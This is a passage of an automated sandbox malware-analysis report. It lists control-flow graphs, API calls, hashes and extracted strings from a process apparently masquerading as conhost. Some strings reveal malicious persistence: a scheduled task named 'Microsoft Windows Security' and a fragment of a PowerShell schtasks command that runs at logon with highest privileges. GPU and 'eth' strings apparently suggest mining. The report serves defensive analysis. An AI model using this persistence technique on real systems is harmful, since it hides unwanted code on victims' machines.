                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy$wcslen
                                                                                                                                                                                              • String ID: $0'$0$@$AMD$APPDATA=$ATI$Advanced Micro Devices$NVIDIA$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                                                                                                                                                                              • API String ID: 1844840824-1300809496
                                                                                                                                                                                              • Opcode ID: 5b5f1375f3de931362796e278fad743eef0130830d29893e114e696d61781ae2
                                                                                                                                                                                              • Instruction ID: c4e8bb1fcba03698f2c9dc95215dcdbf2564759e560c6e022d556f4f5f1b53b3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b5f1375f3de931362796e278fad743eef0130830d29893e114e696d61781ae2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E527314C2C68355FF12A72DE8113F5E760AFA2386F845331DB8815669EF3EA1469B2C

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 424 7ff7b89aee40-7ff7b89aee55 425 7ff7b89aee90-7ff7b89aee9d malloc 424->425 426 7ff7b89aee57-7ff7b89aee63 malloc 424->426 427 7ff7b89aeed2-7ff7b89aef11 abort CreateSemaphoreW TlsAlloc 425->427 428 7ff7b89aee9f-7ff7b89aeeb8 425->428 426->427 429 7ff7b89aee65-7ff7b89aee76 426->429 433 7ff7b89aef30-7ff7b89aef36 GetLastError 427->433 434 7ff7b89aef13-7ff7b89aef22 call 7ff7b89b67e0 427->434 430 7ff7b89aeeba-7ff7b89aeed1 memset 428->430 431 7ff7b89aee78-7ff7b89aee8d memcpy 428->431 429->430 429->431 436 7ff7b89aef27-7ff7b89aef29 433->436 434->436 437 7ff7b89aef38-7ff7b89aef5c abort 436->437 438 7ff7b89aef2b-7ff7b89aef2f 436->438 439 7ff7b89aef78-7ff7b89aef7f 437->439 440 7ff7b89aef5e-7ff7b89aef65 437->440 443 7ff7b89aef81-7ff7b89aefa9 GetLastError TlsGetValue SetLastError 439->443 444 7ff7b89aeff0-7ff7b89aeff6 439->444 441 7ff7b89aefe0-7ff7b89aefe9 call 7ff7b89aee40 440->441 442 7ff7b89aef67-7ff7b89aef73 440->442 441->442 448 7ff7b89aefaf-7ff7b89aefb5 443->448 449 7ff7b89af060-7ff7b89af07a calloc 443->449 446 7ff7b89af10a-7ff7b89af111 444->446 447 7ff7b89aeffc-7ff7b89af006 444->447 446->443 451 7ff7b89af117-7ff7b89af12d 446->451 452 7ff7b89af138-7ff7b89af140 447->452 453 7ff7b89af00c-7ff7b89af014 447->453 456 7ff7b89af0a8-7ff7b89af0cf realloc 448->456 457 7ff7b89aefbb-7ff7b89aefc7 448->457 454 7ff7b89af080 449->454 455 7ff7b89af193-7ff7b89af1a3 abort 449->455 464 7ff7b89af0f1-7ff7b89af0f6 call 7ff7b89aeee0 452->464 465 7ff7b89af142-7ff7b89af15a 452->465 462 7ff7b89af01a-7ff7b89af021 453->462 463 7ff7b89af16c-7ff7b89af180 WaitForSingleObject 453->463 466 7ff7b89af083-7ff7b89af094 TlsSetValue 454->466 459 7ff7b89af1b0-7ff7b89af1b4 455->459 460 7ff7b89af1a5-7ff7b89af1a8 455->460 456->455 461 7ff7b89af0d5-7ff7b89af0ef memset 456->461 457->442 458 7ff7b89aefc9-7ff7b89aefd6 call 7ff7b89aee40 457->458 458->442 469 7ff7b89af1b6 459->469 470 7ff7b89af1ba-7ff7b89af1bd 459->470 460->459 461->466 462->451 472 7ff7b89af027-7ff7b89af02b 462->472 463->462 475 7ff7b89af186-7ff7b89af18e 463->475 473 7ff7b89af100-7ff7b89af104 464->473 465->473 474 7ff7b89af15c 465->474 466->457 467 7ff7b89af09a-7ff7b89af09d GetLastError 466->467 467->457 469->470 477 7ff7b89af1bf-7ff7b89af1c2 470->477 478 7ff7b89af1c4 470->478 472->443 480 7ff7b89af031-7ff7b89af039 472->480 473->446 473->453 481 7ff7b89af160-7ff7b89af168 Sleep 474->481 475->462 477->478 482 7ff7b89af1c8-7ff7b89af1cc 477->482 480->443 483 7ff7b89af03f-7ff7b89af054 ReleaseSemaphore 480->483 481->481 484 7ff7b89af16a 481->484 483->443 484->473
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 342303811-0
                                                                                                                                                                                              • Opcode ID: b2416a83bffa5fc6a8860ff2eb45399a5a421c851ee01e0b810f98d5426b795e
                                                                                                                                                                                              • Instruction ID: cf1d20e8e9cb568e308fc85fdf83f3dd288054aa27180d6cee2b4715b4a06f5d
                                                                                                                                                                                              • Opcode Fuzzy Hash: b2416a83bffa5fc6a8860ff2eb45399a5a421c851ee01e0b810f98d5426b795e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2991A021E09A4381FE15BB29E800679E2A1AF66B86FD44534DB4D0B398DF3DE443C768

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
                                                                                                                                                                                              • String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                                                                                                                                                                              • API String ID: 802779101-808685626
                                                                                                                                                                                              • Opcode ID: ceb530bee48f6c0e02abd5d77287cb5c52b4f910e624d328fc38845c7a1d0db6
                                                                                                                                                                                              • Instruction ID: b7bcb7038e79716f138ab9852e64a108ff733288fec43d05bc251274f24b4bb4
                                                                                                                                                                                              • Opcode Fuzzy Hash: ceb530bee48f6c0e02abd5d77287cb5c52b4f910e624d328fc38845c7a1d0db6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 86418F10B1A11786FE10B769E8157B9DA419FABB86FC04139FA0E477CADD2CE5038739

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionRaiseUnwindabort
                                                                                                                                                                                              • String ID: %S /run /tn "Microsoft Windows Security"$CCG $CCG!$CCG!$CCG"
                                                                                                                                                                                              • API String ID: 4140830120-965913644
                                                                                                                                                                                              • Opcode ID: 72dddc97bb5a61e6f85c6fa6847e3cc55db4e4a0c1a494ea6ad14c540d0c7db8
                                                                                                                                                                                              • Instruction ID: a3c6ec6da5c1aefbdf558f70fa1a067590d34e66ff6c6ad1e2b689279859392c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 72dddc97bb5a61e6f85c6fa6847e3cc55db4e4a0c1a494ea6ad14c540d0c7db8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F51B032A08B8282EB60DB59E4446ADF360F79AB95F904236EFCD17758DF39D582C704

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 544 7ff7b89ac2e0-7ff7b89ac30b 545 7ff7b89ac311-7ff7b89ac32b strncmp 544->545 546 7ff7b89ac708-7ff7b89ac712 544->546 548 7ff7b89ac331-7ff7b89ac366 545->548 549 7ff7b89ac686-7ff7b89ac68f 545->549 546->545 547 7ff7b89ac718 546->547 547->548 551 7ff7b89ac42b-7ff7b89ac495 strlen 548->551 549->548 550 7ff7b89ac695-7ff7b89ac6a3 549->550 550->548 552 7ff7b89ac6a9-7ff7b89ac6af 550->552 553 7ff7b89ac71d 551->553 554 7ff7b89ac49b-7ff7b89ac4e5 call 7ff7b89ae3d0 * 2 551->554 556 7ff7b89ac6b1-7ff7b89ac6b3 552->556 557 7ff7b89ac6b9-7ff7b89ac6c0 552->557 555 7ff7b89ac71f-7ff7b89ac732 553->555 563 7ff7b89ac370-7ff7b89ac373 554->563 564 7ff7b89ac4eb-7ff7b89ac4ee 554->564 556->548 556->557 557->548 559 7ff7b89ac6c6-7ff7b89ac6d3 557->559 559->548 565 7ff7b89ac640-7ff7b89ac650 call 7ff7b89a4e50 563->565 566 7ff7b89ac379-7ff7b89ac385 563->566 567 7ff7b89ac4f4-7ff7b89ac500 564->567 568 7ff7b89ac417-7ff7b89ac41b 564->568 577 7ff7b89ac658-7ff7b89ac66a 565->577 572 7ff7b89ac391-7ff7b89ac3a0 strlen 566->572 573 7ff7b89ac387-7ff7b89ac38b 566->573 567->568 574 7ff7b89ac506-7ff7b89ac518 567->574 569 7ff7b89ac421-7ff7b89ac428 568->569 570 7ff7b89ac733 568->570 569->551 575 7ff7b89ac735-7ff7b89ac738 570->575 578 7ff7b89ac3a6-7ff7b89ac3bf 572->578 579 7ff7b89ac6fc-7ff7b89ac700 572->579 573->572 573->577 580 7ff7b89ac51e-7ff7b89ac520 574->580 581 7ff7b89ac6ec-7ff7b89ac6f4 call 7ff7b89a7190 574->581 575->555 583 7ff7b89ac6d8-7ff7b89ac6e7 call 7ff7b89a7190 577->583 584 7ff7b89ac66c-7ff7b89ac66e 577->584 578->579 585 7ff7b89ac3c5-7ff7b89ac3e1 578->585 579->546 580->581 586 7ff7b89ac526-7ff7b89ac541 call 7ff7b89a7c00 580->586 581->579 590 7ff7b89ac3e5-7ff7b89ac406 call 7ff7b89a4140 strlen 583->590 584->583 589 7ff7b89ac670-7ff7b89ac681 call 7ff7b89a7c00 584->589 585->590 596 7ff7b89ac40a-7ff7b89ac40d 586->596 597 7ff7b89ac547-7ff7b89ac549 586->597 589->590 590->596 596->568 600 7ff7b89ac40f-7ff7b89ac411 596->600 597->596 601 7ff7b89ac54f 597->601 600->568 602 7ff7b89ac73a-7ff7b89ac7d0 call 7ff7b89a44c0 600->602 603 7ff7b89ac550-7ff7b89ac568 601->603 614 7ff7b89ac7d2 602->614 615 7ff7b89ac7dc-7ff7b89ac883 call 7ff7b89ae3d0 * 2 call 7ff7b89aaf20 602->615 604 7ff7b89ac894-7ff7b89ac89b 603->604 605 7ff7b89ac56e-7ff7b89ac571 603->605 607 7ff7b89ac8a1-7ff7b89ac8a4 604->607 608 7ff7b89ac57f-7ff7b89ac587 604->608 605->604 609 7ff7b89ac577-7ff7b89ac579 605->609 607->608 611 7ff7b89ac8aa-7ff7b89ac8b0 607->611 613 7ff7b89ac599-7ff7b89ac5b1 608->613 609->608 612 7ff7b89ac888-7ff7b89ac88f 609->612 616 7ff7b89ac5c0-7ff7b89ac5c2 611->616 612->596 617 7ff7b89ac590-7ff7b89ac595 613->617 618 7ff7b89ac5b3-7ff7b89ac5b5 613->618 614->615 615->575 622 7ff7b89ac5c4-7ff7b89ac5ce 616->622 623 7ff7b89ac5fd-7ff7b89ac628 call 7ff7b89a4240 call 7ff7b89a4140 616->623 617->613 618->617 620 7ff7b89ac5b7 618->620 620->616 622->623 626 7ff7b89ac5d0-7ff7b89ac5e2 622->626 623->596 636 7ff7b89ac62e-7ff7b89ac631 623->636 626->616 629 7ff7b89ac5e4 626->629 632 7ff7b89ac5e8-7ff7b89ac5f7 629->632 632->632 633 7ff7b89ac5f9-7ff7b89ac5fb 632->633 633->622 633->623 636->603
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: strlenstrncmp
                                                                                                                                                                                              • String ID: Z$Z$_$_$_$_GLOBAL_
                                                                                                                                                                                              • API String ID: 1310274236-662103887
                                                                                                                                                                                              • Opcode ID: 0fcc65ab773e09d1c95a171ce18abb01d38a9909dba44128c082fc48aaf376b1
                                                                                                                                                                                              • Instruction ID: 871d926ac672e424f893af392dd3ee1b64119fa20fa62b36c19575f5bb6a866f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fcc65ab773e09d1c95a171ce18abb01d38a9909dba44128c082fc48aaf376b1
                                                                                                                                                                                              • Instruction Fuzzy Hash: DAE1C372A0868389EB209F3984043FDBBE1AB2675DF844131DBAC1F799DF3C95429764

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 638 7ff7b89adb76-7ff7b89adb9b 639 7ff7b89adba1-7ff7b89adba6 638->639 640 7ff7b89adcf0-7ff7b89adcf4 638->640 641 7ff7b89adc03-7ff7b89adc08 639->641 642 7ff7b89adba8-7ff7b89adbad 639->642 640->639 643 7ff7b89adcfa 640->643 647 7ff7b89adcc5-7ff7b89adcd5 call 7ff7b89b6698 641->647 648 7ff7b89adc0e 641->648 644 7ff7b89adc22-7ff7b89adc32 signal 642->644 645 7ff7b89adbaf-7ff7b89adbb4 642->645 646 7ff7b89adc50 643->646 649 7ff7b89adcd7-7ff7b89adcda 644->649 650 7ff7b89adc38-7ff7b89adc4c signal call 7ff7b89ad530 644->650 645->646 652 7ff7b89adbba 645->652 653 7ff7b89adc55-7ff7b89adc5a 646->653 647->649 665 7ff7b89add10-7ff7b89add24 signal 647->665 654 7ff7b89adc60-7ff7b89adc65 648->654 655 7ff7b89adc10-7ff7b89adc15 648->655 660 7ff7b89adcae-7ff7b89adcb8 649->660 661 7ff7b89adcdc-7ff7b89adce8 649->661 650->646 658 7ff7b89adca0-7ff7b89adca5 652->658 659 7ff7b89adbc0-7ff7b89adbc5 652->659 654->646 662 7ff7b89adc67-7ff7b89adc6c 654->662 655->646 663 7ff7b89adc17-7ff7b89adc1c 655->663 667 7ff7b89adc6e-7ff7b89adc7e signal 658->667 668 7ff7b89adca7-7ff7b89adcac 658->668 659->646 666 7ff7b89adbcb-7ff7b89adbd0 659->666 669 7ff7b89add00-7ff7b89add07 660->669 670 7ff7b89adcba-7ff7b89adcc1 660->670 661->653 662->660 662->667 663->644 663->660 665->653 666->660 671 7ff7b89adbd6-7ff7b89adbe6 signal 666->671 673 7ff7b89adc84-7ff7b89adc87 667->673 674 7ff7b89add29-7ff7b89add3b signal 667->674 668->646 668->660 670->647 675 7ff7b89add40-7ff7b89add52 signal 671->675 676 7ff7b89adbec-7ff7b89adbef 671->676 673->660 677 7ff7b89adc89-7ff7b89adc95 673->677 674->653 675->653 676->660 678 7ff7b89adbf5-7ff7b89adc01 676->678 677->653 678->653
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: signal
                                                                                                                                                                                              • String ID: CCG
                                                                                                                                                                                              • API String ID: 1946981877-1584390748
                                                                                                                                                                                              • Opcode ID: 622aaefb939983e8cfa3c03c2c8c57c18b3dbb29334c475367122cbf61766b0c
                                                                                                                                                                                              • Instruction ID: c28d8369e8a291c8a151793af41d4c4e7945510e8b090018bafaec277541680e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 622aaefb939983e8cfa3c03c2c8c57c18b3dbb29334c475367122cbf61766b0c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 85416210E5810345FF79316C4854378C1A15FABBA6FD84A35D7AE8B3E9CDBDB8824129
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: QueryVirtual
                                                                                                                                                                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                              • API String ID: 1804819252-1534286854
                                                                                                                                                                                              • Opcode ID: 654ce188c381b815c7b6b833e69e620537265554bb3c12851122444eed8c47ad
                                                                                                                                                                                              • Instruction ID: c6385d4ffb6c74aa2a59152ff042998e466b4736c52d84a0f4c8a1351f8e2698
                                                                                                                                                                                              • Opcode Fuzzy Hash: 654ce188c381b815c7b6b833e69e620537265554bb3c12851122444eed8c47ad
                                                                                                                                                                                              • Instruction Fuzzy Hash: FA61E872B0965386EF10AF59E840679F7A4BB66B95F844134EF8D07398DE3CE442C718
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fwprintf
                                                                                                                                                                                              • String ID: %*.*S$%-*.*S$%.*S
                                                                                                                                                                                              • API String ID: 968622242-2115465065
                                                                                                                                                                                              • Opcode ID: 6329df8f87e1defb220bbd85e09ae994a33894e23f7f198cf0174e87fe780c51
                                                                                                                                                                                              • Instruction ID: 971ce2b632e3a411b91d1130c60a6d9f3cea295d4eb5f8ec6b2821595b695892
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6329df8f87e1defb220bbd85e09ae994a33894e23f7f198cf0174e87fe780c51
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1441E563A1824385FF51AA19D4407B8E690AFA2B96F988134FB4D477CDDE3CE4028728
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: %*.*s$%-*.*s$%.*s$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest
                                                                                                                                                                                              • API String ID: 0-2632607494
                                                                                                                                                                                              • Opcode ID: ce82155f069b17e6ff1fedf17130a6fce25f9ce1dd8a985e9d653b1ebc39d665
                                                                                                                                                                                              • Instruction ID: 43ee6eafe77ed751d3238b5489c240150387c01e708c42be9fe59595db0092d3
                                                                                                                                                                                              • Opcode Fuzzy Hash: ce82155f069b17e6ff1fedf17130a6fce25f9ce1dd8a985e9d653b1ebc39d665
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D41A772A1828785EB606E6DD400778F695EB62B95F94C134EF4D463CDEA6CB4028B34
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memsetwcscatwcscpywcslen
                                                                                                                                                                                              • String ID: \??\$eth
                                                                                                                                                                                              • API String ID: 468205783-1480138707
                                                                                                                                                                                              • Opcode ID: f31949c7558e9127311c871981880f2ece800f83b94ef884c3d885029afe51e3
                                                                                                                                                                                              • Instruction ID: 0a8361b82f0b4fd6b89b1f9da492dd4771bd35bc29258cc0600b9b17097b5a67
                                                                                                                                                                                              • Opcode Fuzzy Hash: f31949c7558e9127311c871981880f2ece800f83b94ef884c3d885029afe51e3
                                                                                                                                                                                              • Instruction Fuzzy Hash: D431942191C78384FF11AB39E801375F364BF66789F844235EA8D47799DF3DA0968B28
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualProtect.KERNEL32(00007FF7B89C4958,00007FF7B89C4950,00007FF7B89C3E20,00007FFDB240ADA0,?,?,?,00000001,00007FF7B89A124C), ref: 00007FF7B89AD96D
